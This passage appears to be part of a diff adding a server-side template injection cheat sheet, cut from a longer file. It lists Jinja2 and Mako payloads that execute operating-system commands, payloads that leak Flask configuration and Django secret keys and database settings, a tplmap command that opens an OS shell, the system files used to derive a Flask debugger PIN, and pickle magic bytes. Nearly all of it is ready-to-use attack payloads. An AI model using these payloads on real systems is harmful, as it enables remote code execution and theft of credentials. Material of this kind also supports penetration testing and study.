+  {{url_for.__globals__["os"].popen("id").read()}}
+  {{cycler.__init__.__globals__.os.popen("id").read()}}
+FLASK CONFIG LEAK:
+  {{config}}
+  {{config.items()}}
+DJANGO SETTINGS:
+  {{settings.SECRET_KEY}}
+  {{settings.DATABASES}}
+MAKO QUICK RCE:
+  ${__import__('os').popen('id').read()}
+TPLMAP ONE-LINER:
+  python3 tplmap.py -u "URL?param=test" --os-shell
+FLASK PIN FILES:
+  /etc/machine-id
+  /proc/sys/kernel/random/boot_id
+  /sys/class/net/eth0/address      → MAC address
+  /proc/self/cgroup                → Docker container ID
+PICKLE MAGIC BYTES: \x80\x04\x95 (base64: gASV)
+```